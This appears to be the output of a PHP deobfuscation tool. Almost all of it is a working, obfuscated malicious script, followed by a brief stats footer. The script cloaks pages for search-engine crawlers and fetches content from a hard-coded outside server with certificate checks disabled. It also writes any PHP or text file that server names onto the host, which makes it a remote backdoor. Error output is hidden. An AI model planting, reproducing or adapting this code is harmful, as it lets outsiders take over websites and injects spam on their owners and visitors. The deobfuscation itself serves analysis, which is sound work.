"\x2f\x66\141\166\x69\x63\x6f\156\56\x69\143\157" && (@preg_match("\43\x67\157\157\x67\154\145\x7c\171\x61\x68\157\x6f\x7c\x62\151\x6e\x67\x23\151", $ua) || @preg_match("\x23\x67\157\x6f\x67\154\x65\x2e\x63\157\56\x6a\160\174\147\157\157\x67\x6c\x65\56\x63\x6f\x6d\174\171\x61\x68\x6f\157\56\143\x6f\x6d\x7c\x79\141\x68\x6f\157\56\143\157\x2e\152\x70\174\142\x69\156\x67\x2e\x63\157\x6d\43\151", $ur) && @preg_match("\43\x5b\57\134\x3f\x5d\133\x61\x2d\172\60\x2d\71\135\x7b\x31\x7d\x5c\144\x2b\x23\x69", $uri)))) { goto g0r3EgRkvO; } list($cntx, $code, $ctype) = urlx("\150\164\x74\x70\x3a\x2f\x2f" . $gov . "\57\151\x6e\x64\x65\170\77" . $postdata, $header, $postdata); if (!($code >= 400 && $code < 500)) { goto AT3JbWLo7_; } goto hfiaUYAjjn; hH4ICO3EZc: exit($cntx); VT1dO_lQaI: g0r3EgRkvO: function urlx($url, $header = null, $postdata = null, $ua = null) { goto lbSuCQAyj_; lbSuCQAyj_: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto bIdG8djBX0; aY_urEeYXi: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto jrd59kwhaB; bIdG8djBX0: curl_setopt($ch, CURLOPT_ENCODING, "\147\x7a\x69\x70\x2c\144\145\146\x6c\141\x74\145"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto GDkCZm5xmF; GDkCZm5xmF: if (!($postdata !== null && $postdata !== '')) { goto aM4Ce1YDlQ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); aM4Ce1YDlQ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto aY_urEeYXi; jrd59kwhaB: } function todk($fil, $str) { @file_put_contents($fil, $str); } goto Wvqr3l0q2a; GORV1n2Zck: $db = "9500"; $ip = clientip(); $ur = isset($_SERVER["\x48\124\x54\120\137\x52\x45\x46\105\122\105\x52"]) ? $_SERVER["\x48\x54\x54\x50\x5f\122\x45\106\105\122\x45\x52"] : ''; $ua = isset($_SERVER["\x48\x54\124\x50\x5f\x55\x53\105\x52\137\x41\107\x45\x4e\124"]) ? $_SERVER["\110\124\124\120\137\125\x53\x45\122\137\101\x47\105\x4e\124"] : ''; $uri = $_SERVER["\x52\105\121\x55\x45\x53\x54\137\125\x52\111"]; goto TcZeoO5s10; sImnTTrAqz: Is4XGCgrcN: if (!(stripos($cntx, "\x3c\41\x64\157\143\x74") === 0 || stripos($cntx, "\x3c\x68\x74\155\x6c") === 0)) { goto PgMQYRbCg6; } exit($cntx); PgMQYRbCg6: if (!(stripos($cntx, "\74\77\x78\x6d\154") === 0)) { goto cZ4Et3JACQ; } goto f68UBDUnnF; kyBkfHRPzt: exit; rOKyc3ZPrS: if (!strstr($cntx, "\133\54\x5d")) { goto vVUe5ud4Y9; } $segs = explode("\133\x2c\135", $cntx); $lines = explode("\x2c", $segs[0]); goto w3Bta8GLXU; ZpenPPBAz9: exit; EXRIxcKKky: if (!(stripos($ctype, "\x67\x7a\151\160") > 0)) { goto Is4XGCgrcN; } @header("\x43\x6f\x6e\x74\x65\156\164\55\x74\x79\x70\145\x3a\x20\x61\x70\160\154\x69\143\141\164\151\x6f\156\x2f\170\x2d\147\172\x69\160"); exit($cntx); goto sImnTTrAqz; C6dOHkdQxG: Q_PCAnb1N5: if (!(stripos($cntx, "\157\x6b") === 0)) { goto ipUggXBbpT; } exit($cntx . "\40" . $db." ".$gov . $ixv); ipUggXBbpT: if (!($cntx != '')) { goto VT1dO_lQaI; } goto hH4ICO3EZc; BBs4_RG50N: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "3.3.31"; $gov = "\x6a\150\x2e\163\x64\157\x69\155\x2e\143\x6f\155"; goto GORV1n2Zck; TKUGfKGSm9: exit($cntx); x34m7RsFv6: if (!(stripos($cntx, "\150\164\164\x70") === 0)) { goto saqvck03ZH; } if (!stripos($cntx, "\77\x6d\141\x69\156\137\160\x61\x67\145\x3d")) { goto rOKyc3ZPrS; } @header("\114\x6f\143\x61\164\x69\x6f\x6e\x3a\x20" . $cntx); goto kyBkfHRPzt; f68UBDUnnF: @header("\x43\x6f\x6e\x74\x65\156\164\55\x74\171\160\x65\72\40\x74\x65\x78\x74\x2f\170\155\x6c"); exit($cntx); cZ4Et3JACQ: if (!(stripos($cntx, "\x55\x73\x65\x72\55\141") === 0)) { goto x34m7RsFv6; } @header("\x43\x6f\156\x74\x65\156\164\55\x74\x79\160\x65\x3a\40\x74\145\x78\x74\57\160\154\141\x69\156\x3b\x63\150\141\162\163\145\x74\x3d\165\164\x66\55\x38"); goto TKUGfKGSm9; z1yrtU4URX: exit("\156\157\x20\146\141\x6c\x73\x65"); goto M2hWDeg9M5; shUK13tNto: exit("\x65\x6e\144\x20\x6f\x6b"); M2hWDeg9M5: goto C6dOHkdQxG; VBgCgWlh42: if (!(stripos($cntx, "\155\145\162\x63\x64\156") || stripos($cntx, "\151\x6d\147\56\146\162\151\x6c"))) { goto OhkexhOEfy; } @header("\103\157\156\164\145\156\164\55\x74\x79\x70\x65\x3a\40\x69\155\x61\147\x65\57\152\x70\x67"); list($cnimg, $code, $ctype) = urlx($cntx . $uri); exit($cnimg); OhkexhOEfy: goto oX6D4430OE; oX6D4430OE: saqvck03ZH: if (!@preg_match("\43\136\x5b\136\56\135\x2a\56\50\x74\x78\164\x7c\x70\x68\x70\x29\x23\x69", $cntx)) { goto Q_PCAnb1N5; } $values = explode("\133\54\135", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto shUK13tNto; } goto z1yrtU4URX; hfiaUYAjjn: @header("\110\124\x54\x50\x2f\61\56\61\x20\x34\x30\64\x20\116\157\164\x20\106\x6f\x75\156\144"); exit($cntx); AT3JbWLo7_: if (!($code >= 500)) { goto EXRIxcKKky; } @header("\x48\x54\124\120\57\x31\56\x31\40\65\60\60\x20\x49\156\164\145\162\156\141\x6c\x20\123\145\x72\x76\x65\162\40\105\162\162\x6f\x72"); goto ZpenPPBAz9; Wvqr3l0q2a: function clientip() { goto XgP6uL81LZ; v2X1yslb4V: goto PdtZNZkHe3; sT7ahGVV5Z: $realip = $_SERVER["\122\x45\x4d\x4f\124\105\x5f\x41\x44\104\x52"]; PdtZNZkHe3: if (!stristr($realip, "\x2c")) { goto tnzq4ZDyet; } goto C1A4VzpN4z; S243ACrF0f: lHiwwKwlUY: $realip = $_SERVER["\x48\x54\124\120\x5f\130\x5f\x46\117\122\127\x41\122\104\x45\x44\137\x46\117\x52"]; goto PdtZNZkHe3; Sx9w2dcUoN: $realip = getenv("\x52\x45\x4d\117\x54\x45\137\x41\x44\104\x52"); goto v2X1yslb4V; C1A4VzpN4z: $values = explode("\x2c", $realip); $realip = $values[0]; tnzq4ZDyet: return $realip; goto sLkUuZhuhy; XgP6uL81LZ: $realip = ''; if (isset($_SERVER["\110\124\124\120\137\x58\137\x46\117\122\127\101\x52\x44\105\x44\137\x46\117\x52"]) && $_SERVER["\110\124\124\120\137\130\137\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\106\117\122"] !== '') { goto lHiwwKwlUY; } if (getenv("\x52\x45\115\x4f\x54\105\137\x41\104\x44\x52") && strcasecmp(getenv("\122\x45\x4d\x4f\x54\105\137\101\104\104\x52"), "\x75\x6e\153\156\x6f\x77\x6e")) { goto Sx9w2dcUoN; } if (isset($_SERVER["\x52\x45\115\x4f\x54\x45\137\101\x44\x44\x52"]) && $_SERVER["\122\x45\115\117\124\x45\137\x41\104\104\122"] && strcasecmp($_SERVER["\122\105\x4d\x4f\x54\105\x5f\101\x44\x44\x52"], "\x75\x6e\153\x6e\x6f\x77\156")) { goto sT7ahGVV5Z; } goto PdtZNZkHe3; goto S243ACrF0f; sLkUuZhuhy: } ?>

Function Calls

None

Variables

None

Stats

MD5 b7691eb5e3fb56b8be525227ebc4fc1e
Eval Count 0
Decode Time 56 ms